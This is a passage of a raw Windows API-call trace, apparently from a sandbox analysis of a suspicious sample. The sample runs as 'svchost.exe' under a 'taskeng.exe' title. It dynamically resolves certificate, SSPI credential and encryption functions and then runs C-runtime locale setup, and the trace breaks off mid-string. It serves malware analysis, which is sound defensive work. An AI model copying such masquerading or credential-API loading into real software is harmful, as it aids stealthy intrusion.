	[0188.214] GetProcAddress (hModule=0x75610000, lpProcName="CertFindCertificateInStore") returned 0x756225e8
	[0188.214] ResetEvent (hEvent=0x8) returned 1
	[0188.214] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.216] GetProcAddress (hModule=0x75610000, lpProcName="CertOpenStore") returned 0x7561df23
	[0188.216] ResetEvent (hEvent=0x8) returned 1
	[0188.216] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.219] GetProcAddress (hModule=0x75610000, lpProcName="CertGetCertificateContextProperty") returned 0x75620bda
	[0188.219] ResetEvent (hEvent=0x8) returned 1
	[0188.219] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.221] GetProcAddress (hModule=0x75610000, lpProcName="CertFindExtension") returned 0x75622595
	[0188.221] ResetEvent (hEvent=0x8) returned 1
	[0188.221] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.224] GetProcAddress (hModule=0x75610000, lpProcName="CertCreateCertificateContext") returned 0x75620b37
	[0188.224] ResetEvent (hEvent=0x8) returned 1
	[0188.224] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.226] LoadLibraryW (lpLibFileName="Secur32.dll") returned 0x75390000
	[0188.253] ResetEvent (hEvent=0x8) returned 1
	[0188.253] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.255] GetProcAddress (hModule=0x75390000, lpProcName="ApplyControlToken") returned 0x753c47de
	[0188.257] ResetEvent (hEvent=0x8) returned 1
	[0188.257] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.259] GetProcAddress (hModule=0x75390000, lpProcName="QueryContextAttributesA") returned 0x753ba43b
	[0188.259] ResetEvent (hEvent=0x8) returned 1
	[0188.259] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.262] GetProcAddress (hModule=0x75390000, lpProcName="EncryptMessage") returned 0x753b52e4
	[0188.262] ResetEvent (hEvent=0x8) returned 1
	[0188.262] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.264] GetProcAddress (hModule=0x75390000, lpProcName="AcceptSecurityContext") returned 0x753b7b49
	[0188.264] ResetEvent (hEvent=0x8) returned 1
	[0188.264] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.267] GetProcAddress (hModule=0x75390000, lpProcName="AcquireCredentialsHandleA") returned 0x753ba11a
	[0188.267] ResetEvent (hEvent=0x8) returned 1
	[0188.267] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.269] GetProcAddress (hModule=0x75390000, lpProcName="DeleteSecurityContext") returned 0x753b3323
	[0188.269] ResetEvent (hEvent=0x8) returned 1
	[0188.269] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.272] GetProcAddress (hModule=0x75390000, lpProcName="InitializeSecurityContextA") returned 0x753c4c32
	[0188.272] ResetEvent (hEvent=0x8) returned 1
	[0188.272] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.274] GetProcAddress (hModule=0x75390000, lpProcName="DecryptMessage") returned 0x753b53b2
	[0188.274] ResetEvent (hEvent=0x8) returned 1
	[0188.275] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.277] GetProcAddress (hModule=0x75390000, lpProcName="FreeContextBuffer") returned 0x753b2daf
	[0188.277] ResetEvent (hEvent=0x8) returned 1
	[0188.277] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.280] LoadLibraryW (lpLibFileName="SHELL32.dll") returned 0x75bb0000
	[0188.290] ResetEvent (hEvent=0x8) returned 1
	[0188.290] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.292] GetProcAddress (hModule=0x75bb0000, lpProcName="SHGetSpecialFolderPathA") returned 0x75dffb26
	[0188.292] ResetEvent (hEvent=0x8) returned 1
	[0188.292] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfba8 | out: lpSystemTimeAsFileTime=0x1dfba8*(dwLowDateTime=0x5a029720, dwHighDateTime=0x1d50a6a)) 
	[0188.297] GetCurrentThreadId () returned 0x418
	[0188.297] GetCurrentProcessId () returned 0x110
	[0188.297] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfba0 | out: lpPerformanceCount=0x1dfba0*=26213509034) returned 1
	[0188.297] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0188.297] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.297] GetLastError () returned 0x57
	[0188.297] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0188.302] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0188.302] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.302] GetLastError () returned 0x57
	[0188.302] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.303] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.303] GetLastError () returned 0x57
	[0188.303] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0188.303] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0188.303] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0188.303] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.303] GetLastError () returned 0x57
	[0188.303] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0188.304] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0188.304] GetProcessHeap () returned 0x260000
	[0188.304] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.304] GetLastError () returned 0x57
	[0188.304] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.304] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.304] GetLastError () returned 0x57
	[0188.304] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0188.304] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0188.304] GetLastError () returned 0x57
	[0188.304] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0188.304] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x364) returned 0x27bb80
	[0188.305] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0188.305] SetLastError (dwErrCode=0x57) 
	[0188.305] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xc00) returned 0x27bef0
	[0188.306] GetStartupInfoW (in: lpStartupInfo=0x1dfa74 | out: lpStartupInfo=0x1dfa74*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1001cf30, hStdOutput=0x51be7056, hStdError=0xfffffffe)) 
	[0188.306] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0188.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0188.306] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0188.306] GetCommandLineA () returned="svchost.exe"
	[0188.306] GetCommandLineW () returned="svchost.exe"
	[0188.306] GetLastError () returned 0x57
	[0188.306] SetLastError (dwErrCode=0x57) 
	[0188.306] GetLastError () returned 0x57
	[0188.306] SetLastError (dwErrCode=0x57) 
	[0188.306] GetACP () returned 0x4e4
	[0188.306] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x27b838
	[0188.306] IsValidCodePage (CodePage=0x4e4) returned 1
	[0188.306] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1dfaa4 | out: lpCPInfo=0x1dfaa4) returned 1
	[0188.306] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1df36c | out: lpCPInfo=0x1df36c) returned 1
	[0188.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x1df108, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.306] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x1df380 | out: lpCharType=0x1df380) returned 1
	[0188.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x1df0b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.306] GetLastError () returned 0x57
	[0188.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.307] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0188.307] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0188.307] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x1deea8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.307] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x1df880, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xda\xfe\xa5\x41\xbc\xfa\x1d", lpUsedDefaultChar=0x0) returned 256
	[0188.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df980, cbMultiByte=256, lpWideCharStr=0x1df0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ便ဂĀ") returned 256
	[0188.307] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ便ဂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0188.307] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ便ဂĀ", cchSrc=256, lpDestStr=0x1deec8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0188.307] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x1df780, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa